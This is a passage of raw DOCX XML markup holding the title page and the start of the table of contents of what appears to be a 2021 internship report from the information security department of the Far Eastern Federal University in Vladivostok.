                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2021 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="0C080BC3" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0308ADEC" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7F04EDF4" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B29A4D2" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="525" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07A514E3" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-150" w:firstLine="150"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>по</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="283" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="631F0109" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-150" w:firstLine="150"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>«</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3777956E" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>26</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01AC6AAA" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>»</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2126" w:type="dxa"/>
            <w:gridSpan w:val="4"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E84BD18" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>июня</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1103" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55572A8B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2021 г.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="0B2AA852" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1951" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BB7F595" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4B552261" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="1C14C77F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Е.В. Третьяк</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="643607F6" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="07DC4462" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4888" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:vMerge w:val="restart"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2838192D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>на предприятии</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="28EA2A37" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1951" w:type="dxa"/>
            <w:gridSpan w:val="6"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E880483" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(подпись)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="284" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="432214AB" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2176" w:type="dxa"/>
            <w:gridSpan w:val="3"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0D7FC05C" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>(И.О. Фамилия)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="790353E6" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0FB68D87" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4888" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:vMerge/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="696027F7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:widowControl w:val="0"/>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:line="276" w:lineRule="auto"/>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="7CE87528" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A6240A5" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6656CA6A" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2AA0217F" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4888" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="5C31C892" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">Кафедра информационной </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="75618AC5" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CE383DA" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3F463A02" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="042C234A" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4888" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2C528914" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>безопасности  ШЕН</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve"> ДВФУ</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="132779E2" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4411" w:type="dxa"/>
            <w:gridSpan w:val="10"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A15A4D9" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="280" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6B61E748" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="279" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="25F295D1" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:ind w:left="-108" w:right="-108"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4888" w:type="dxa"/>
            <w:gridSpan w:val="9"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="000000"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="666A32B0" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="5C08D4DD" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6C7B94D0" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="445A0304" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="59DB124D" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="4B09E43E" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4C3291A2" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="123C3AF0" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="55860A0B" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="46D4AD45" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2BADD517" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2"/>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="1742DD06" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="680808B4" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>г. Владивосток</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00CB3331" w14:paraId="7B85A9E2" w14:textId="77777777" w:rsidTr="007860B2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9858" w:type="dxa"/>
            <w:gridSpan w:val="21"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7B25FDC7" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="007860B2">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>2021</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:sdt>
      <w:sdtPr>
        <w:rPr>
          <w:rFonts w:ascii="Liberation Serif" w:eastAsia="Liberation Serif" w:hAnsi="Liberation Serif" w:cs="Liberation Serif"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:id w:val="-995720560"/>
        <w:docPartObj>
          <w:docPartGallery w:val="Table of Contents"/>
          <w:docPartUnique/>
        </w:docPartObj>
      </w:sdtPr>
      <w:sdtEndPr>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:sdtEndPr>
      <w:sdtContent>
        <w:p w14:paraId="51D34733" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
          <w:pPr>
            <w:pStyle w:val="a5"/>
          </w:pPr>
          <w:r>
            <w:t>Оглавление</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="2222A4B3" w14:textId="72349D0F" w:rsidR="000C0E85" w:rsidRPr="000C0E85" w:rsidRDefault="00CB3331" w:rsidP="000C0E85">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:r>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r>
            <w:instrText xml:space="preserve"> TOC \o "1-3" \h \z \u </w:instrText>
          </w:r>
          <w:r>
            <w:fldChar w:fldCharType="separate"/>
          </w:r>
          <w:hyperlink w:anchor="_Toc75213383" w:history="1">
            <w:r w:rsidR="000C0E85" w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rStyle w:val="a4"/>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>Задание на практику</w:t>
            </w:r>
            <w:r w:rsidR="000C0E85" w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="000C0E85" w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="000C0E85" w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc75213383 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="000C0E85" w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="000C0E85" w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="separate"/>
            </w:r>
            <w:r w:rsidR="000C0E85" w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
            <w:r w:rsidR="000C0E85" w:rsidRPr="000C0E85">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:fldChar w:fldCharType="end"/>
            </w:r>
          </w:hyperlink>
        </w:p>
        <w:p w14:paraId="261530C2" w14:textId="74546DC2" w:rsidR="000C0E85" w:rsidRPr="000C0E85" w:rsidRDefault="000C0E85" w:rsidP="000C0E85">
          <w:pPr>
            <w:pStyle w:val="11"/>
            <w:rPr>
              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              <w:noProof/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
            </w:rPr>
          </w:pPr>
          <w:hyperlink w:anchor="_Toc75213384" w:history="1">
            <w:r w:rsidRPr="000C0E85">
